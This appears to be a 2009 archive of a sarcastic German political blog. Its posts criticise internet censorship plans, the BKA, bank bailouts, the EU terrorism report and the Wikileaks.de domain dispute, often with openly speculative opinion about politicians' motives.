[l] Wisst ihr, was für Politiker die größte Furcht im Bezug auf "Killerspiele" ist? Dass die Bürger sich mal informieren. Anders kann ich jedenfalls diese Meldung nicht deuten:
Auf anhaltenden politischen Druck musste nun auch in Nürnberg ein Intel Friday Night Game abgesagt werden. Damit fällt auch das zugehörige Eltern-LAN flach, mit dem interessierte Eltern im Rahmen der Veranstaltung über das oft missverstandene Hobby ihres Nachwuchses informiert werden sollten.
Wo kämen wir da hin, wenn sich Eltern über Killerspiele informieren, und feststellen, was für eine hanebüchene Verblödungsstrategie die Politiker da mit ihrer lächerlichen Argumentationssimulation fahren. Das geht offensichtlich gar nicht. Der Lacher ist, dass die jetzt nach Hannover ausweichen wollen. Wo der Obermufti der Anti-Killerspiele-Nebelwerfer sitzt, derr allseits beliebte Herr Schünemann. Keine sonderlich überzeugende Idee, wenn ihr mich fragt.
Oh und wisst ihr, wer das Eltern-LAN unterstützt hat? Die Bundeszentrale für politische Bildung. Dass sie die noch nicht ganz zugemacht haben erstaunt mich jeden Tag von neuem. Bildung ist doch genau das Gegenteil dessen, was dieses Regime mit der Bevölkerung vorhat.

Wed Apr 22 2009

[l] Der EU Terrorism Situation and Trend Report 2009 ist veröffentlicht worden. Und was soll ich euch sagen… die Situation ist beängstigend. Wir sind alle so gut wie tot. 2008 wurden in den EU-Staaten 515 Terroranschläge verübt, 1009 Terroristen festgenommen (?!?) und es gab vier Todesfälle eines ETA-Anschlages in Spanien. Gar grauslig auch, wie die Terroristen alle Linksextreme sind:
Right-wing terrorist attacks were not reported in 2008.
Ob das damit zusammen hängt, dass die Strafverfolger, die diese Statistik gemacht haben, alle eher rechts sind? Wenn Nazis jemanden verprügeln ist das eine Körperverletzung, wenn Linke online Schwimmbeckenreiniger kaufen, ist das ein versuchter Terroranschlag.
Aber ein paar wichtige Erkenntnisse aus dem Report will ich euch nicht vorenthalten:
The use of the Internet has become pivotal in all types of terrorism. It offers anonymity in the exchange of information, making it easy for these organisations to communicate and spread propaganda.
Und da haben wir es: wer anonym kommunizieren will, muss ein Terrorist sein.
Women play an important role as associates in supporting terrorist organisations (translating texts on websites, providing their names for subscriber registration, acting as couriers, spreading propaganda, arranging marriages of convenience, etc.). Their contribution should not be underestimated.
Na endlich spricht das mal einer aus. Wenn die Frauen nur alle wieder ordentlich zurück an den Herd gehen würden, dann hätten wir diese ganzen Probleme nicht!1!!
Und guckt nur, was für furchtbare Schandtaten den Frauen da vorgeworfen werden! Sie haben ihren Namen für Abos / Mobilfunkverträge hergegeben! Alle ab in den Knast, sofort!! Oh und sie haben Texte übersetzt! Für dieses Sakrileg ist man im Mittelalter noch als Ketzer verfolgt worden! Warum sollte das heute anders sein?! Und als Kuriere sollen sie gehandelt haben! Dieser Kritikpunkt kommt wahrscheinlich von jemandem, der noch nicht mitgekriegt hat, dass das Postmonopol gefallen ist. Und dann Propaganda-Verbreiten, das geht nun wirklich nicht. Für sowas haben wir doch ehemalige Nachrichtenmagazine! Und Scheinhochzeiten, also wirklich, schämt euch, ihr fiesen gesetzlosen Terrorfrauen!

Tue Apr 21 2009

[l] Am 5. Mai wollen die um EU-Parlament abstimmen, ob das Internet zugemacht werden soll oder nicht. Das ist eine harte Deadline. Bis dahin müsst ihr getan haben, was ihr jeweils tun könnt, um das zu verhindern. Abgeordnete anrufen. Briefe schreiben. Protestieren.
Update: Da hab ich wohl die Webseite geplättet. *hust* Nun, äh, ist wieder da. Bei Quadrature du Net und telekompaketet.se ist die Deadline deutlich kürzer. Selbst wenn die Deadline um sein sollte: Druck machen. Macht den Abgeordneten deutlich, dass jetzt Schluß mit lustig ist.

Tue Apr 14 2009

[l] Meine Güte, was da wegen Wikileaks.de plötzlich für eine heiße Luft verbreitet wird, das geht auf keine Kuhhaut. Leute, kommt mal runter. Der Provider wurde also geoutet und weist alle Schuld von sich. Wie überraschend!!1! Einziges Indiz für deren Tatsachenbehauptung ist, dass jemand einem Heise-Reporter das gesagt hat. Wir haben weder die angebliche Kündigung gesehen, noch haben wir Theodor Reppe des Lügens überführt, noch ist klar, warum der Provider die Domain wie eine heiße Kartoffel fallen gelassen hat.
Der Reihe nach: Niemand hat behauptet, das DENIC habe die Domain gesperrt. So sah das noch nie aus, denn wenn ich beim DENIC säße und eine Domain plattmachen wollen würde, würde ich versehentlich den Eintrag in der .de-Zone verlieren oder so, jedenfalls würde es nicht wie Absicht aussehen. Und dann würde sich ein Domaingrabber die Domain greifen und da Pornos oder Trojaner verbreiten, und dann wäre die Domain verbrannt.
Nein, das war von Anfang an klar, dass da der Registrar, bei dem die Domain angemeldet war, oder der ISP, über den der Deal lief, die Domain fallen gelassen hat. Und da lag und liegt immer noch die Vermutung nahe, dass da jemand von außen nachgeholfen hat. Ich stelle mir das ungefähr so vor:
*klingel*
Ja hallo?
Guten Tag, hier ist das Bundeskriminalamt. Sie hosten da gerade unter wikileaks.de Kinderpornographie. Wenn Sie die Domain schnell wegmachen, sparen wir uns die Durchsuchung.
*domainlösch*
Dieses Vorgehen hätte auch den großen Vorteil, dass der Provider die Schnauze hält, denn er kann ja schlecht der Presse sagen, hey, wir haben Kinderpornos gehostet und nichts gemerkt, bis das BKA bei uns anrief.
Der Provider sagt, er habe fristgemäß gekündigt. Ich weiß ja nicht, wie euch das so geht, aber wenn mein Provider mir mitteilt, dass er demnächst alle meine Domains auf den Boden fallen lässt, das würde ich dann schon mitkriegen. Hier steht also im Moment Aussage gegen Aussage. Und solange das so ist, erübrigen sich weitere Berichterstattung dazu.
Ich persönlich halte die Ansage des ISPs für nicht glaubwürdig. Denn das ist genau das, was ich sagen würde, wenn ich wikileaks.de plattgehauen hätte, und mich da plötzlich und unerwartet jemand von Heise zu befragen würde. Beweisen muss man da auch nichts, man behauptet einfach, man habe das per Email gemacht, und das muss dann wohl der Spamfilter auf der Gegenseite verschluckt haben. Dass ein ISP Mailserver-Logs manipulieren kann, das muss ich hier glaube ich niemandem erklären. Und da das auch noch im Jahr 2008 war, bestand da auch noch keine Vorratsdatenspeicherungspflicht. Was für ein erfreulicher Zufall für den ISP. Anfang Dezember haben die für Ende März gekündigt. Das finde ich schon mal ungerade, aber gut. Und dann noch zwei Wochen weiter laufen lassen. Weil Ostern war oder wie? Nee, tut mir leid.
Hat sich Wikileaks mit der Zensur-Presseerklärung zu weit aus dem Fenster gelehnt? Kann man finden. Ich finde es nicht. Um nicht zu sagen: kann ich nachvollziehen, die Reaktion. Und ein laues Dementi des Providers gegenüber Heise würde ich auch nicht zum Anlass nehmen, da irgendwas zurück zu rufen.
Aber mal unabhängig von Wikileaks: mir gehen ja gerade die Leute tierisch auf den Sack, die da jetzt groß einen auf "told you so" machen. Erstens: Nein, hast du nicht vorher gesagt. Zweitens: die Faktenlage ist nicht besser als vorher. Drittens: den anderen mangelnde Recherchen und voreiliges Schlüsseziehen vorwerfen und dann selber unrecherchiert und voreilig schlussfolgernd auf eine Heise-Meldung hin die Aussage des Providers als Fakten hinzunehmen, obwohl es eine Gegenaussage des Domainbesitzers gibt, … das würde sogar einem Spiegel-Redakteur auffallen, dass das ein Widerspruch ist.
Überhaupt, AGB-Verletzung, dass ich nicht lache. Das ist die Standardausrede von Billig-Providern, wenn sie Kunden loswerden wollen. Das war z.B. schon immer die Standardbegründung, wenn Flatrate-Anbieter "Vieluser"-Kunden rauskanten wollten. Da muss schon mehr kommen als so eine Platitüde, so eine auf-F-Taste-gelegter-Textblock Standardausrede.
Nochmal zum Mitmeisseln: ich halte Denic für gänzlich unschuldig, im Gegenteil muss man deren Transit-Verfahren loben, sonst wäre die Domain jetzt nämlich tatsächlich eine Trojanerschleuder in Spammerhänden. Ob der Provider Mist gemacht hat oder nicht, wird sich noch zeigen müssen. Bisher sieht es für mich so aus. Wenn es so abgelaufen ist, wie ich das oben skizziert habe, würde ich denen trotzdem nur eine Teilschuld geben. Dann den Schwanz einzuziehen und die Domain zu canceln ist eine sehr menschliche Reaktion. Es hat nicht jeder das Zeug zum Helden und zu zivilem Ungehorsam. Mal ganz pragmatisch gesprochen: wenn das BKA bei einem Provider eine "Hausdurchsuchung" macht und da einmal das Equipment rausträgt, am besten noch inklusive der Rechner und Daten unbeteiligter Kunden, dann ist der ISP tot. Da hat sich unsere Junta einfach mal den längeren Hebel gegeben.
Update: AHA, es kommt Licht ins Dunkel. Wikileaks hat noch eine Erklärung herausgegeben und jetzt sieht das schon ganz anders aus. Der Domaininhaber hat da über seinen Provider versucht, die Domain bnd.de zu sich zu transferieren, und deshalb hat der Provider ihm gekündigt. Das ist immerhin eine nachvollziehbare Begründung, auch wenn sich mir nicht direkt erschließt, wieso das jetzt ein Vertragsbruch sein soll. Immerhin hat der BND sofort widersprochen und damit war das ohne Schaden für irgendjemanden vom Tisch. Unter diesen Umständen frage ich mich aber schon, wieso Wikileaks in der Presseerklärung behauptet, sie hätten von nichts gewußt. Der Zeitpunkt kam überraschend, aber dass sie da gekündigt würden, war angesagt. Und dass mündliche Zusagen nicht das Papier wert sind, auf dem sie stehen, das weiß ja wohl auch jeder, der schon mal mit der Telekom-Hotline telefoniert hat. Kurz gesagt: JETZT könnte man über ein "told you so" nachdenken. :-)

Fri Apr 10 2009

[l] Aus der beliebten Reihe "Die Polizei, dein Freund und Helfer": Wie die Polizei in den 70er Jahren Terroranschläge plante.
Die Vorstellung scheint absurd. Doch im Deutschen Herbst der 70er-Jahre wollten die deutschen Sicherheitsbehörden im Kampf gegen den Terror der Roten Armee Fraktion (RAF) schlicht keine Möglichkeit ungenutzt lassen. Am Ende gingen sie offenbar sogar soweit, dass sie Terror-Anschläge planten. Diese Pläne wollten sie dann der RAF unterschieben.
Konkret geht es um das baden-würtembergische Landeskriminalamt und das BKA. Das BKA? Ja, das BKA! Die, deren Integrität und Willkürfreiheit so vollständig unbestreitbar ist, dass unsere Junta sie gerade unser Internet zensieren lassen will! Und wer war damals zuständig?
So habe der damalige Präsident des Bundeskriminalamts (BKA), Horst Herold, im Oktober 1975 die „Grundsätze der Desinformation zur Terrorismusbekämpfung“ ausarbeiten lassen. Die Ideen des Konzepts reichten von gefälschten Nachrichten über das „Eindringen in gegnerische Gruppierungen“ bis zur „Förderung bandeninterner Konflikte“.
Und von was für Anschlägen reden wir hier?
Dabei waren der Fantasie offenbar kaum Grenzen gesetzt. Angeblich reichte die Liste von der „Fälschung von Flugblättern“ über das systematische Belügen der Medien bis hin zur Planung von Anschlägen, die der RAF zugeordnet werden sollten. Als Ziele hätten die Staatsschützer die „Trinkwasserversorgung Berlin“ und die Hamburger Elektrizitätswerke vorgeschlagen.
Aber macht euch keine Sorgen, das haben sie nie wirklich gemacht. Unsere Polizei würde sowas NIE tun. Daher ist am Ende des Artikels auch ein wunderbarer Disclaimer:
„Das Desinformationskonzept wurde fallen gelassen“, sagte der damalige LKA-Chef Kuno Bux, „weil es weder rechtlich noch politisch durchsetzbar war.“ Ex-BKA-Präsident Herold würde heute solche Methoden als „untauglich“ verwerfen: „Man sollte die Öffentlichkeit nicht vergrämen.“

Thu Apr 9 2009

[l] Neue Geschäftsmodelle für Abmahnanwälte bei der Wikipedia. Alvar Freude hat eine Abmahnung von einer Person gekriegt, die bei Wikipedia Bilder hochgeladen hat, unter einer Creative Commons Lizenz mit Attribution, und dann Leute abgemahnt hat, die die Wikipedia-Seiten kopieren oder wie im Fall Alvar Freude per Proxy annotiert wiedergeben, ohne eine persönliche Attribution dazu zu editieren. Das ist schon im Normalfall fragwürdig, weil die Wikipedia ja gerade das Ziel hat, dass sich jeder an den Inhalten bedienen kann, aber bei Alvar Freude und seinem Assoziationsblaster ist es geradezu hanebüchen. Die Frau meint das wohl alles gut, wenn man sich ihre Wikipedia-Seite anschaut, sie will da anscheinend Kommerz-Schmarotzern das Wasser abgraben. The road to hell is paved with good intentions.
[l] Die Britischen Spezialexperten überzeugen mal wieder auf ganzer Linie: Polizeichef muss zurücktreten, weil er Geheimdokumente offen mit sich rumgetragen hat. Die haben da eine Photo-Op gemacht und er hat das Dokument bei sich gehabt, so dass die das fotografieren konnten. Danach haben sie dann die Geheimoperation schnell-schnell vorzeitig beenden müssen.
Update: Hier kann man das Geheimdokument lesen.

Fri Apr 3 2009

[l] Und wieder ist ein Artikel verschwunden, auf den ich gerade gelinkt hatte. Stattdessen ist jetzt diese weit zurückhaltender formulierte Whitewash-Variante online.
Was lernen wir daraus? Unabhängige Presse, my ass. Vierte Gewalt, dass ich nicht lache. Bei uns wird die Presse eingeschüchtert, plattgemacht und gleichgeschaltet. Kritik am Staat wird nur geduldet, wenn sie nicht unopportun ist.

Thu Apr 2 2009

[l] Wer dachte, nur in den USA kämen die mit so einer Megakorruption bei der "Bankenrettung" durch, der soll sich mal angucken, wie das bei uns gemacht wird, natürlich mit einem CSUler am Ruder.
Der Bundestag kontrolliert nicht, welchen Banken die Regierung Milliarden gibt. Nur ein kleines Gremium darf Fragen stellen, aber die Antworten müssen geheim bleiben
Warum würde die Regierung auch kontrollieren wollen, wo 480 Milliarden Euro hingehen. Darf ich bei der Gelegenheit daran erinnern, dass wir Hartz IV haben, weil das pro Jahr 10 Milliarden Euro einspart. Und jetzt verbrennen wir mal eben 480 Milliarden, ohne dass unser Parlament auch nur Einblick kriegt, an wen die Kohle geht.

Tue Mar 31 2009

[l] Ich mache ja seit einer Weile keinen Rohstoffdiebstahl mehr, aber dieser Fall ist zu schön, da mache ich mal eine Ausnahme: Komplette Allee gestohlen (270 erst im Herbst gepflanzte Hainbuchen). Der Sachschaden liegt bei 1800 Euro. Das ist eine Größenordnung, die man auch mit ehrlicher Arbeit hätte erreichen können, zumal die da ja eine Nacht lang Bäume ausgegraben haben. Das muss ja echte Knochenarbeit gewesen sein. Und dann Auslagen für einen Miet-LKW, um die abzutransportieren und so. Unter dem Strich haben die da wahrscheinlich Verlust gemacht. (Danke, Markus)

Mon Mar 30 2009

[l] Obama rettet GM:
It is my hope that the steps I am announcing today will go a long way towards answering many of the questions people may have about the future of GM and Chrysler. But just in case there are still nagging doubts, let me say it as plainly as I can — if you buy a car from Chrysler or General Motors, you will be able to get your car serviced and repaired, just like always. Your warrantee will be safe.
In fact, it will be safer than it's ever been. Because starting today, the United States government will stand behind your warrantee.
Na dann ist ja alles gut. Bin mal gespannt, wann der erste Konkurrent wegen Wettbewerbsverzerrung klagt und sie dann für alle Autofirmen die Gewährleistung übernehmen müssen.
Oh und Obama hat auch den GM CEO gefeuert.
Board member Kent Kresa, the former chairman and CEO of defense contractor Northrop Grumman Corp., was named interim chairman of the GM board.
Mhh, Kent Kresa, Kent Kresa… der von der Carlyle Group! Northrop Grumman sind Waffenbauer, wo er für Research and Development gearbeitet hat, d.h. an deren Gruselprojekten. Ausserdem hat er bei DARPA mitgemacht, "where he was responsible for broad, applied research and development programs in the tactical and strategic defense arena", also auf Deutsch: DEREN Gruselprojekte. Und in den 60ies hat er beim MIT deren Raketen-Gruselprojekte gemacht. Kurz gesagt: ein Man In Black. :-)

Thu Mar 26 2009

[l] Woran erkennen die Experten beim BKA eigentlich Raubkopien? Oder Kinderpornographie? Ganz einfach! So und so! Ist doch klar, habt ihr doch sicher auch so gemacht, wenn ihr als Minderjährige Pornos beschafft habt, dass ihr die in eine große Kiste getan habt, auf der groß "MEINE PORNOSAMMLUNG" drauf steht, oder etwa nicht? Macht man doch immer so, wenn man mit verbotenen Dingen hantiert. Man beschriftet sie ordentlich.
[l] Die von der Laien argumentiert ja immer wieder gerne und erfolglos, dass mit Kinderpornographie "monatlich Millionenbeträge" gemacht würden, dass es da eine "Industrie" gäbe. Ist natürlich völliger Blödsinn, und das kann man sich ja auch selber überlegen. Wer zahlt denn für Kinderpornographie, wenn bei pressewirksamen Aktionen wie "Mikado" die Leute wegen Bezahlungen mit ihren geklauten Kreditkarten gerastert wurden? Und wer zahlt für Sachen, die er auch kostenlos kriegt?
Alternativ kann man sich auch einfach die Argumentation von Udo Vetter durchlesen. Der hat auch noch ein paar Beobachtungen aus 1. Hand am Start, die das bestätigen.

Thu Mar 19 2009

[l] Wisst ihr, was Goldman Sachs mit der Bailout-Kohle gemacht hat? Die Idee von "wir geben den Banken Staatskohle" ist ja, dass die damit Kredite vergeben, um den Markt wieder ans Laufen zu bringen. Das hat Goldman Sachs auch getan — aber nicht an ihre Kunden, sondern an ihre Angestellten. Das ist alles so eine free-for-all Geldgrabscher-Party, da gibt es schon gar keine Worte mehr für. Jeder greift so oft und tief in die Kollekte-Kiste wie irgend möglich.

Thu Mar 5 2009

[l] Der Schäuble will sich offenbar gerade mit einem Joe Job am Tauss rächen. Gegen Tauss wird wegen Kinderpornographie ermittelt, seine Immunität wurde aufgehoben. Nun will ich hier keine Kinderpornographen verteidigen, aber die Zufälle in diesem Fall sind auffällig:
1. Ein anderer Typ hatte zwei Nummern von Tauss (sagt ja wohl gar nichts)
2. Besagter Typ sagte der Polizei, er habe Tauss eine DVD geschickt
3. sie haben eine Kipo-MMS mit Tauss' Absender-Nummer gefunden — VÖLLIG UNFÄLSCHBAR!1!!
4. das ganze findet am Tag nach der Auflösung der Kipo-Internet-Filterung-Arbeitsgruppe statt, und Tauss hatte gegen die Internetfilterung opponiert.
Tauss weist natürlich den Verdacht von sich.
Da waren wohl gerade kurzfristig die Genfer Hotels und ausgebucht und Fallschirme alle.
Wobei das ja nicht der Schäuble alleine gewesen sein muss. Tauss hat sich mehr als genügend viele Feinde gemacht.
Außerdem betont er, dort bereits seit Jahren seine Einkünfte offenzulegen und dafür zu kämpfen, dass dies zu einem Standard für alle Mitglieder des Deutschen Bundestages wird.
Armes Deutschland.
Es stellt sich auch die Frage, ob das analog ablaufen würde, wenn ein Terrorist aussagt, er habe seine Waffen von Schäuble gekauft, und der dann Schäubles Telefonnummer gespeichert hat. Ähnlich glaubwürdig ist ja die Beweislage hier gerade.
Update: n-tv berichtet, man habe "einschlägiges Material" gefunden.
Der Politiker habe das Material mit seiner Tätigkeit als Abgeordneter erklärt.
Ich tippe mal, dass das das Propagandamaterial war, dass die von der Laien rumgemailt hatte, um für ihre Internetzensur zu werben. Bei DER und ihren Hintermännern sollten die mal eine Durchsuchung machen!
Update: Der SWR berichtet, es seien "insgesamt 23 Kontakte vermerkt" gewesen, SMS und MMS.
Und der Kölner Stadt-Anzeiger gerüchtet schon mal, die SPD-Fraktion halte Tauss für schuldig und erwarte seine Mandatsrückgabe.
Oh und noch ein spannendes Detail, auf das mich dankenswerterweise Felix hinwies: Tauss hat einen Twitterfeed, wo er immer mit "TwitterFon" twittert, einer Twitter-Anwendung fürs Iphone. Er hat also ein Iphone. Und das Iphone kann gar keine MMSsen verschicken. ACH.
Auch ansonsten ist das mit der MMS unglaubwürdig. Tauss war einer der wichtigsten Gegner der Kryptoregulierung. Der Mann versteht, was Verschlüsselung ist. Und wir (der CCC) haben ihm das mit der Vorratsdatenspeicherung und Verschlüsselung erklärt. So jemand verschickt doch keine inkriminierende MMS!
Update: Der Vorsitzende des Immunitätsausschusses ist der Schwiegersohn von Schäuble.

Fri Feb 27 2009

[l] Fannie Mae hat 2008 59 Milliarden Verlust gemacht, 25 davon alleine im vierten Quartal. Natürlich haben sie sich erst mal wieder bei der Bailout-Schlange angestellt.
[l] Mauschelnews aus dem Innenministerium: Wie der IT-Chef des Innenministeriums die Anforderungen für den Bundes-CIO so zurecht gemauschelt hat, dass er selbst der Traumkandidat ist.
Update: steht kein Datum dran, ist offenbar echt alt. Und es wurde auch ein anderer Bundes-CIO. Danke an Migri für die Aufklärung.

Thu Feb 26 2009

[l] Die Amerikaner haben die Nase voll von den inkompetenten Bundeswehr-Heinis, die ihnen in Afghanistan nur im Weg rumstehen beim Opiumschmuggel.
Shapiro: Der Beitrag der Europäer, auch der Deutschen, war in dem Gebiet einfach grausig. In mancher Hinsicht stünden wir jetzt besser da, wenn sie gar nichts gemacht hätten.
Da fragt man sich ja schon, was für eine Opium-Produktion die da angepeilt hatten. Oder vielleicht ist das anders herum. Vielleicht ist das die US-Methode, gegen das Überangebot vorzugehen. Vielleicht waren die Deutschen nicht korrupt genug und haben zu wenig für den Eigenbedarf abgezweigt und deshalb haben wir jetzt so ein Überangebot.
Egal wie das nun konkret ist, ein erfreuliches Fazit drängt sich auf: die Bundeswehr ist zu inkompetent für Kriegseinsätze. Das freut mich persönlich außerordentlich. Vielleicht können wir dann jetzt auch mal endlich diesen NATO-Scheiß beenden und die Bundeswehr auflösen. Mit dem da zu sparenden Geld könnte man alle Schulen renovieren. Oder ne halbe Kleinbank retten!1!!
[l] Wie Pädophilenverfolgung in der Praxis abläuft. Hint: genau wie man sich das vorstellt. Ein Typ kam in eine IRC-Gruppe und hat sich da an die Kinder rangemacht und sie zu Webcam-Sex überreden wollen, daraufhin haben die Channel-Regulars den angezeigt. Der hat dann einen Deal gemacht:
In exchange for Goldstein's help prosecuting seven cases involving botnets, federal prosecutors agreed to charge him with a single misdemeanor hacking charge for damage he inflicted on a University of Pennsylvania server. In October, he received just three months in prison (http://www.theregister.co.uk/2008/10/22/child_abuse_charges/) despite being caught with about 1,000 images of child pornography.
Denn was ist schon Kindesmissbrauch gegen ein paar Botnets!1!!
Und weil mir das so viele geschickt haben: Einblicke in die Kinderpornoszene. Fand ich jetzt nicht so berauschend, Kapitel 4 ist vielleicht noch ein bisschen interessant aber im Großen und Ganzen genau so, wie man sich das denken würde. Die Inhalte liegen in Deutschland, aber auf die greift man über Proxies im Ausland zu, die dann nur verschlüsselt mit den Backends in Deutschland kommunizieren. Bezahlt wird über gestohlene Kreditkartendaten und gefälschte Papiere. Deals angeleiert werden über Affiliate-Programme. Also alles wie auch sonst bei den Scammern üblich ist, mit Ausnahme der Proxy-Geschichte. Der Rest von dem Artikel sind mehr oder weniger schwer erträgliche Rechtfertigungs- und Rationalisierungsversuche.

Mon Feb 23 2009

[l] Und hier haben wir noch einen klaren Fall von Balls of Steel Award: Ein Nigerianer (!) hat der Citibank (!!) vorgemacht, er sei die Bank von Ätiopien und hat da 27 Mio Dollar rausgetragen.
The money came from a Citibank account in New York held by the National Bank of Ethiopia, that country’s central bank. Prosecutors said the conspirators, contacted by Citibank to verify the transactions, posed as Ethiopian bank officials and approved the transfers.
Muhahaha, wie im Fernsehen! Hat aber nicht lange gehalten, die Freude, weil der Depp in die USA eingereist ist.
Mr. Amos was arrested last month as he tried to enter the United States through Los Angeles, a prosecutor, Marcus A. Asner, said in Federal District Court in Manhattan.
Die haben das überhaupt nur gemerkt, weil einige der Zielbanken in den Überweisungen die Kohle zurück geschickt haben, weil sie da was nicht zuordnen konnten. (Danke, Jens)
[l] Lacher des Tages: Saudi-Scheich verkündet, dass Biotreibstoff Sünde ist, weil er "hauptsächlich aus Alkohol gemacht sei". Tja, das ist dann wohl Schicksal bzw der Wunsch Allahs, dass wir weiterhin alle auf Erdöl setzen.

Tue Feb 17 2009

[l] Länderdomino: Die Russische Industrieproduktion fiel im Januar um 20%. Und auch jetzt im Februar sieht es nicht besser aus. Heute haben sie erst mal die Börse zugemacht.

Fri Feb 13 2009

[l] Und noch eine Breitseite zur Internet-Zensur unserer Junta: der CCC veröffentlicht den Vertrag zwischen BKA und ISPs.
Kurz zusammengefasst: das BKA gibt den ISPs eine Liste mit "vollqualifizierten Domainnamen", die die ISPs dann innerhalb von 6 Stunden zu sperren haben. Die ISPs dürfen keine Einträge der Liste ignorieren. Der ISP darf die Liste auf offensichtliche Mängel überprüfen und dann dem BKA Bescheid sagen. Wenn die Liste das ganze Internet zensiert, darf der ISP temporär die vorige Version der Liste in die Zensurinfrastruktur einspielen. Leider sagt §3 Absatz 6, dass die vorige Version unverzüglich gelöscht werden muss, wenn eine neue Version reinkommt. Physik und Logik sind halt keine Stärke des Bundeskriminalamts.
Natürlich darf der ISP die Liste nicht leaken (werden wir ja sehen). Damit sind die letzten Zweifel ausgeräumt, dass die da politische Gegner mit mundtot machen wollen, denn das Veröffentlichen einer Liste mit geblockten Kinderporno-Sites wäre ja kein Problem, ausser da sind dann auch "Feindsender" drauf. Und es legt auch die Vermutung nahe, dass es gar nicht um das Verfolgen von Kinderpornographie geht, denn wenn die Liste öffentlich ist, könnte man ja sehen, ob die Sites auch vom Netz genommen werden, d.h. ob die Polizei tatsächlich die Täter dingfest macht, oder ob es hier nur um das Einführen einer Zensur-Infrastruktur geht.
Die ISPs müssen die Sperrung in ihre AGBs aufnehmen. Dadurch entsteht den Kunden der ISPs ein Sonderkündigungsrecht. Da nicht alle ISPs mitmachen, rechnen wir mit größeren Umwälzungen im ISP-Markt, wenn die Kunden, die keinen Bock auf Zensur haben, von ihrem Sonderkündigungsrecht Gebrauch machen.
Das Highlight des Vertrages: Das BKA haftet für Vermögensschäden, die dem ISP durch die Zensur entstehen.
Der Vertrag kann mit einer Frist von drei Monaten schriftlich gekündigt werden. Hoffentlich werden da einige ISPs von Gebrauch machen, wenn ihnen die Kunden wegrennen.
Rein technisch fällt auf, dass die da explizit von einer Liste von "vollqualifizierten Domainnamen" reden, nicht von Regex- oder Wildcard-Matches, d.h. wenn der erste Kinderporno-Anbieter einen Wildcard-DNS-Record einträgt, läuft die Liste gegen eine Wand. Der Vertrag wurde offensichtlich von Leuten gemacht, die sich nicht durch Sachkenntnis der Materie ablenken liessen.
Oh und ein Detail gibt es noch: der Vertrag regelt keine Vertragsstrafen. Damit ist er weitgehend sinnlos.

Sat Feb 7 2009

[l] Die deutsche "Security"-"Forschung" ist echt ein widerlicher Klüngel. Nehmt nur mal nur mal dieses tolle neue Deutsche Forschungszentrum für IT-Sicherheit. Klingt ja erst mal nicht schlecht. Die TU Darmstadt hat ja mit dem DECT-Kram immerhin mal was vorzuweisen. Aber dann liest man Fraunhofer, da gehen ja schon mal direkt die Alarmglocken an, und dann CAST e.V. (guckt euch mal die Konferenzen des CAST-Forums an, das ist das IT-Äquivalent der Bertelsmann-Stiftung), und jetzt gucken wir uns mal an, was Heise über deren Direktor schreibt:
Der Direktor des CASED, Professor Johannes Buchmann, ist zugleich Vorsitzender der CAST e.V., der Dienstleistungen im Bereich Sicherheit der Informationstechnik mit dem Schwerpunkt Internet anbietet.
Aha, ein Verein, der Dienstleistungen anbietet. Tolle Wurst. Aber jetzt flüstert mir gerade ein Vögelchen folgendes interessante Detail:
Ausserdem ist Buchmann Mitglied des wissenschaftlichen Beirates des BKA und leitet dort die Experten-Kommission "Online-Durchsuchung".
Ach na sowas. Das Palpatine Institut für angewandte Politologie, wie?
Leider finde ich gerade keine Webseite beim BKA, über die ich das verifizieren könnte. Der Buchmann hat sich aber schon einige Male zum Bundestrojaner geäußert in der Presse, das könnt ihr ja mal selber googeln.
Update: In diesem PDF der TU Darmstadt auf Seite 10 steht, dass Buchmann Beirat des BKA ist.
Außerdem hat mir noch ein Vögelchen geflüstert, dass der Buchmann derjenige ist, der die Arbeit von deDECTed.org als Werk seines Instituts ausgegeben hat. Und dank dieser Darstellung hat das DECT Forum einen bezahlten Beratervertrag mit seinem Laden abgeschlossen. Ihr könnt euch ja ausmalen, wie das bei den Leuten ankommen muss, die da tatsächlich die Arbeit gemacht haben. Meine Quelle meinte noch, dass die DECT-Hacker jetzt CASED auflaufen lassen, und am Ende das DECT-Forum schlecht beraten wird. Kann ich alles nicht nachprüfen aber halte es für durchaus glaubwürdig so aus der Ferne.
Update: Oh und übrigens: die Hardware für den DECT-Hack hat der CCC bezahlt. Die Gesamtleistung von CASED bei der Nummer war im Grossen und Ganzen die Presseerklärung, die Mathias Schindler hier sehr gut zusammenfasst.

Sun Feb 1 2009

[l] Ich habe hier ja schon viel über die Klärschlamm-Hypotheken geschrieben. Wahrscheinlich habt ihr keine grosse Lust, dan noch eine Geschichte zu hören. Solltet ihr aber! Diese hier.
Die Geschichte handelt von einem Hedge Fonds, dessen Mitarbeiter sich die Klärschlamm-Hypotheken angesehen haben, und sofort gesehen haben, dass das demnächst kollabieren muss. Ursprünglich haben sie sich nämlich gar nicht die Hypotheken selbst angesehen, sondern die Firmen, die die Hypotheken unters Volk gebracht haben. Und als sie sahen, dass die unmöglich zurück gezahlt werden würden, haben sie sich entschieden, die Aktien der Herausgeber leerzuverkaufen.
Das war leider teuer, denn dafür leiht man sich ja die Aktie einmal, und verkauft sie dann. Und das Leihen war bei diesen Aktien vergleichsweise teuer.
Später kam dann die Möglichkeit, dass man dann nicht die Aktien selbst leerverkaufen konnte, sondern darauf basierende Bonds. Das ist billiger, also haben sie das gemacht. Und die ganze Zeit haben sie sich gefragt, wieso sie die Großbanken Leerverkäufe machen lassen. Und eines Tages sitzt der eine Typ dann mit einem Fondsmanager beim Abendessen, der nur Bonds mit rottigen CDOs "verwaltet", und lacht ihn aus, weil er solchen Klärschlamm am Bein hat, und will gerade sein Mitleid ausdrücken, weil lange hat der ja nicht mehr zu leben, da sagt ihm dieser Fondsmanager folgendes (und das muss ich mal in Gänze zitieren, weil es so ein grandioser Aha-Moment ist):
That’s when Eisman finally got it. Here he’d been making these side bets with Goldman Sachs and Deutsche Bank on the fate of the BBB tranche without fully understanding why those firms were so eager to make the bets. Now he saw. There weren’t enough Americans with shitty credit taking out loans to satisfy investors’ appetite for the end product. The firms used Eisman’s bet to synthesize more of them. Here, then, was the difference between fantasy finance and fantasy football: When a fantasy player drafts Peyton Manning, he doesn’t create a second Peyton Manning to inflate the league’s stats. But when Eisman bought a credit-default swap, he enabled Deutsche Bank to create another bond identical in every respect but one to the original. The only difference was that there was no actual homebuyer or borrower. The only assets backing the bonds were the side bets Eisman and others made with firms like Goldman Sachs. Eisman, in effect, was paying to Goldman the interest on a subprime mortgage. In fact, there was no mortgage at all. “They weren’t satisfied getting lots of unqualified borrowers to borrow money to buy a house they couldn’t afford,” Eisman says. “They were creating them out of whole cloth. One hundred times over! That’s why the losses are so much greater than the loans. But that’s when I realized they needed us to keep the machine running. I was like, This is allowed?”
